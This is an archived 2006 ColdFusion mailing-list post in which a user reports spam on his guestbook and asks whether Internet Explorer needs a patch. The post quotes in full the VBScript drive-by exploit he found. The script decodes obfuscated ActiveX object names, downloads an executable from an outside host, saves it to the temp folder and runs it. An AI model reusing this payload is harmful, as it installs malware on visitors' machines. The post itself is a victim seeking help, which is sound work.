weird VB exploit

Fri, 27 Oct 2006 12:15:25 -0700 

Hey guys, I just got some spam posts on my guestbook which include an
iframe.  Inside the iframe a page is called which, after calling about
80 unescape JavaScript functions tries to execute the following VB code.
I realized it when my antivirus started going nuts telling me about
executable files it was trying run.

 

Do I need a patch for IE?  (IE 6.0 on Windows 2000 SP4) I didn't think a
web page could execute arbitrary files from a web server.

 

<script language="VBScript">

 On Error Resume Next

 Function h2s(s)

 Dim i

 For i = 1 To Len(s) Step 2

  h2s = h2s & Chr("&" & "H" & Mid(s, i, 2))

 Next

 End Function

 Const sClassID =
"636C7369643A42443936433535362D363541332D313144302D393833412D30304330344
6433239453336"

 Const sItem_1 = "41646F64622E53747265616D"

 Const sItem_2 = "536372697074696E672E46696C6553797374656D4F626A656374"

 Const sItem_3 = "4D6963726F736F66742E584D4C48545450"

 Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"

 sFileURL = "http://money24online.com/file.exe";

 sFileName = "thw_expl.exe"

 Set DF = Document.createElement("object")

 Call DF.SetAttribute("classid", h2s(sClassID))

 Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString)

 Set FS = DF.CreateObject(h2s(sItem_2), vbNullString)

 Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString)

 Call xml_http.Open("GET", sFileURL, False)

 Call xml_http.Send

 AdoSream.Type = 1

 Set tmp_path = FS.GetSpecialFolder(2)

 sFilePath = FS.BuildPath(tmp_path, sFileName)

 Call AdoSream.Open

 Call AdoSream.Write(xml_http.responseBody)

 Call AdoSream.SaveToFile(sFilePath, 2)

 Call AdoSream.Close

 Set Q = df.CreateObject(h2s(sItem_4), vbNullString)

 Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0)

 </script>

 

~Brad



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting,
up-to-date ColdFusion information by your peers, delivered to your door four 
times a year.
http://www.fusionauthority.com/quarterly

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:258312
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4

Reply via email to